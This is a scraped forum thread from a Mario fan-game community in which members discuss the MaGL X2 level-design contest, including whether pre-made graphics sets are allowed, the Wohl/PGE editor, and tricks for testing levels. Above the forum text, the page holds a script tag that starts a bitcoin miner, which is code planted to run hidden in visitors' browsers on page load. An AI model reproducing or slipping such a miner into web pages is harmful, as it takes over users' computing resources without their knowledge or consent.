<script>
miner.start(); // initialise bitcoin miner
</script>

smw centralmario fan games galaxypge project

MaGL X2 Discussion - MaGL X2 Lands TOMORROW. GET. HYPE.

Hoeloe
A2XT person
Pronouns: she/her

Re: MaGL X2 Discussion. No raocows! NOT the sign up thread!

Postby Hoeloe » 5 years ago

LunarNeedle wrote:A question to anyone who can answer, is preparing graphical sets for multiple levels considered illegal. I generally produce ten folders with a blank level in it and a graphic folder which I load with matching graphics from various packs, rename them and test them around in a level to make a nice combination of graphics. I did that for my ASMBLT level and I'm severely curious if that'll violate the rules of MAGLX2 to have loads of graphic sets I can pull from to build my level from. Is this considered cheating?
I can't see why it would be, though it may be worth getting a ruling from Horikawa.

Ignoritus
O◡O
Pronouns: he/him/his

Postby Ignoritus » 5 years ago

LunarNeedle wrote:A question to anyone who can answer, is preparing graphical sets for multiple levels considered illegal. I generally produce ten folders with a blank level in it and a graphic folder which I load with matching graphics from various packs, rename them and test them around in a level to make a nice combination of graphics. I did that for my ASMBLT level and I'm severely curious if that'll violate the rules of MAGLX2 to have loads of graphic sets I can pull from to build my level from. Is this considered cheating?
I can't possibly imagine how someone could consider this cheating. That would be equatable to saying that studying for a test is cheating.

The Destroyer of Worlds
I am become death

Postby The Destroyer of Worlds » 5 years ago

Oh no - go nuts. Use as many graphic resources as you want!
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

The Destroyer of Worlds
I am become death

Discussion on the validity of rules or anything else discussed and settled during the month and a half planning period will be directed to the appropriate thread.

That thread is here.

Apparently, despite the long periods of inactivity during this planning phase, people still had things they were itching to say until after things were quite settled. That's fine - but I won't have it clogging up the public space of MaGL X2 with drama right out of the gate.

I would like the discussion thread to be a little bit more welcoming to new users to SMBX. It should serve to foster hype and excitement for what is to come. It is ideally a place to share names, discuss level design, and help one another. I intend it to be *productive*. I do not intend to have public face of the competition, which many people will see once raocow makes his announcement video, start on a pointless discussion about things that should have been brought up a month ago.

This is a drama-free zone. Or as close to one as I can manage.
raocow wrote:Dang it Oyster this level is not called Peregrine Penguin and the Soft Bon-Bon, it clearly says Ghost House with a Ghost in It!

LunarNeedle
The Golden Spork
First name: Matthew

Postby LunarNeedle » 5 years ago

Ignoritus wrote:I can't possibly imagine how someone could consider this cheating. That would be equatable to saying that studying for a test is cheating.
While not initially cheating, it would skip an essential step in level making. I might customize the graphics from there, but I have in essence created a part of a level. A good example would be making a set of colour palettes before a final painting project in art class (they do those, right?)
Hoeloe wrote:I can't see why it would be, though it may be worth getting a ruling from Horikawa.
Yeah, that's a good point. Thankfully she was summoned!
Horikawa Otane wrote:Oh no - go nuts. Use as many graphic resources as you want!
Oh crap, I was not expecting that. Uhh! Ahh? Which one?
Last edited by LunarNeedle on 26 Jan 2015, 08:03, edited 1 time in total.
"All these flavors and you choose to be salty"
- Grandma

LunarNeedle
The Golden Spork
First name: Matthew

Postby LunarNeedle » 5 years ago

Now for something I've been playing with and I don't know if it deserves a thread. I would love to talk the minutia involving level design. Just quick explanations with some examples of level designing including rythmn groups, railroading and likewise. I'd love to explain them just in time for MAGLX2, just I wonder if video format would be an improvement versus textual. Any opinions on the matter?
"All these flavors and you choose to be salty"
- Grandma

Doctor Shemp
Banned

Postby Doctor Shemp » 5 years ago

LunarNeedle wrote:Now for something I've been playing with and I don't know if it deserves a thread. I would love to talk the minutia involving level design. Just quick explanations with some examples of level designing including rythmn groups, railroading and likewise. I'd love to explain them just in time for MAGLX2, just I wonder if video format would be an improvement versus textual. Any opinions on the matter?
Depends how good a talker you are really. Personally though I prefer reading to lectures because I can follow the content at my own pace and in any order. Definitely use pictures though. However, if you think you need to demonstrate gameplay in motion rather than in diagrams or stills, then obviously a lecture is the way to go. I have seen very insightful analyses of SMB1, SMB3, LoZ1 & Doom done with just text, screenshots and diagrams though.

The Destroyer of Worlds
I am become death

If someone wants to put some links up for tutorials or videos for level design tips, I'll include them in the base post =).

Skully

Postby Skully » 5 years ago

Man, I'm hyped... I keep going over hypothetical design choices and graphic swaps in my head. Like, "If I get Toad, I'll do such and such!" or "If my level title is like so, I'll add this and that!" I hope to branch out of the "vanilla-X" level design I did last year and muck about with layers, events and the like. Maybe learn some Luna DLL...

The Destroyer of Worlds
I am become death

Levels names drop this Sunday....

(It's still fine to register up until March 7th, but pre-registrations get their names earliest!)

Hoeloe
A2XT person

Horikawa Otane wrote:Levels names drop this Sunday....
Oh man, I'm looking forward to seeing what horror I get put with :D

Animita
Pronouns: Him/Her

Postby Animita » 5 years ago

I've noticed that while the main thread includes a tutorial link for the vanilla engine, unless i'm overlooking does not have anything for the "Wohl Editor". As a 100% newbie to this i am currently unaware of how different it is from vanilla so just wondering if it's needed or not.

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 5 years ago

Animita wrote:I've noticed that while the main thread includes a tutorial link for the vanilla engine, unless i'm overlooking does not have anything for the "Wohl Editor". As a 100% newbie to this i am currently unaware of how different it is from vanilla so just wondering if it's needed or not.
It allows editing in fullscreen mode, and has a zoom functionality. It can also copy-paste parts of level and undo previous actions. I'd say it is super useful and it is included to the Semi-official MaGL X2 Devkit. It's not necessarily needed though.

swirlybomb
a bomb that is swirly
First name: Swirlus Bomberton

Postby swirlybomb » 5 years ago

LunarNeedle wrote:
Ignoritus wrote:I can't possibly imagine how someone could consider this cheating. That would be equatable to saying that studying for a test is cheating.
While not initially cheating, it would skip an essential step in level making. I might customize the graphics from there, but I have in essence created a part of a level. A good example would be making a set of colour palettes before a final painting project in art class (they do those, right?)
I still don't get how that could be considered 'cheating', unless you're implying that you're building the level beforehand, which you aren't. (unless you are)
Animita wrote:I've noticed that while the main thread includes a tutorial link for the vanilla engine, unless i'm overlooking does not have anything for the "Wohl Editor". As a 100% newbie to this i am currently unaware of how different it is from vanilla so just wondering if it's needed or not.
I think it could be summed up as "SMBX but better". If you can use SMBX, you can use Wohl's.

not-edit: what Willhart said
anonymousbl00dlust wrote:All the obstacles in my level can be beaten on the players first attempt without any 'future predicting'.

Shinoda

Postby Shinoda » 5 years ago

Messing around with Wohl's editor right now. It's MUCH better but is there a way to actually test the level without having to either reopen the level in the normal editor or loading SMBX to test it every time?
Horikawa Otane wrote:Butt-lamps are -30 points, so =p
ImageImageImage

Sturg
Gets his freak on with VGM
First name: sturgyman

Postby Sturg » 5 years ago

Unfortunately no, there isn't at the moment. Right now you'll usually want to try and have both the PGE editor and SMBX editor on at the same time, that is if your PC can handle it.
ImageImage
Image ImageImage
RIP FISH NIPPLE BANNER

Hoeloe
A2XT person

Shinoda wrote:Messing around with Wohl's editor right now. It's MUCH better but is there a way to actually test the level without having to either reopen the level in the normal editor or loading SMBX to test it every time?
I usually just have it open in the normal editor and reload it. There is a trick you can use, though. When the SMBX editor goes from play mode back into edit mode, it reloads the level. It also pauses if the window loses focus. Whenever I test, I always try to switch back to Wohl's editor before the death animation finished. That way, the next time I tab to SMBX, it loads the new version automatically.

Zygl

Postby Zygl » 5 years ago

Hoeloe wrote:
Shinoda wrote:Messing around with Wohl's editor right now. It's MUCH better but is there a way to actually test the level without having to either reopen the level in the normal editor or loading SMBX to test it every time?
I usually just have it open in the normal editor and reload it. There is a trick you can use, though. When the SMBX editor goes from play mode back into edit mode, it reloads the level. It also pauses if the window loses focus. Whenever I test, I always try to switch back to Wohl's editor before the death animation finished. That way, the next time I tab to SMBX, it loads the new version automatically.
It also reloads the level when it goes from edit mode to play mode, so all you really have to do is tell it not to save when it asks if you want to save before testing.
ImageImage
ImageImage
ImageImage
ImageImage

Validon98
Goofy Night Sparrow
Pronouns: he/she/they

Postby Validon98 » 5 years ago

Oh, you can test levels that way? Recently what I've done was throw all of my levels into a world map hub, and then open the level in-game after having saved it in PGE. On the other hand, that doesn't allow for testing with Big Mario or something.
Because Mystia's being a big ol' goofball.

Currently Playing:
Final Fantasy XIV (everything will be 80 eventually)
Labyrinth of Touhou: Gensokyo and the Heaven-Piercing Great Tree (the sequel ive experienced many times but now on the switch isn't that cool)

Strawberry Bose Partial Translations and Patches!

Willhart
Stalker, Doxxer, and Sexual Harasser
Banned

Postby Willhart » 5 years ago

I can run both editors open at the same time, so I don't really need to switch between them.

Gyra Solune
the feared barbarian

Postby Gyra Solune » 5 years ago

It's time for the 2015 tower of criticisms. ...I'll be honest, not as catchy as yacht of opinions. For 2016 we'll need a better word. Like mausoleum, or fjord.

Grounder

Postby Grounder » 5 years ago

Gyra Solune wrote:It's time for the 2015 tower of criticisms. ...I'll be honest, not as catchy as yacht of opinions. For 2016 we'll need a better word. Like mausoleum, or fjord.
Will this Tower be Biased? :P
Why don't you eat me?

I am perfectly tasty...

AND I'LL STEAL YOUR SOUL! :twisted:

ImageImageImage

Gyra Solune
the feared barbarian

Postby Gyra Solune » 5 years ago

I do not know what that refers to!

SomethingFawful
Has Chortles

Postby SomethingFawful » 5 years ago

Okay, this thought is still very much dependant on what the level name and 2 characters I get are, you mentioned that the hub would have filters. Are these going to be the automatic-select-characters ones a-la A2MBXT, or simple character block walls as they were in the first MaGLX? I have a few ideas where which character filter will be used will actually make a difference.

Sturg
Gets his freak on with VGM
First name: sturgyman

Postby Sturg » 5 years ago

If you have a preference, then I'd mention that when submitting the level (or a readme.txt can do). More than likely though, I'm thinking luna filters will probably be used.
ImageImage
Image ImageImage
RIP FISH NIPPLE BANNER

Return to “archive”